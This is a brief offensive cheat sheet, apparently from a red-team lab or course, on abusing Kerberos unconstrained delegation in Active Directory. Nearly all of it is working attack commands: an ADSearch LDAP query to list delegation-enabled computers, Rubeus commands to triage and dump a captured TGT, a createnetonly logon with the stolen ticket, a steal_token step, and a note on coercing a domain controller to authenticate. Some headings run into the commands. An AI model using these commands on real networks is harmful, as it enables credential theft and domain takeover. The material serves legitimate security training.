Unconstrained Delegation
Dump all permitted computers
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostnameCheck (triage) all current tickets
Rubeus.exe triage
| 0x11674c | nlamb @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IOExtract the TGT and leverage it via a new logon session
Rubeus.exe dump /luid:0x11674c /nowrapRubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=
[+] ProcessID : 2964steal_token 2964Force the domain controller to authenticate to the web server to steal its TGT
Tooling
Last updated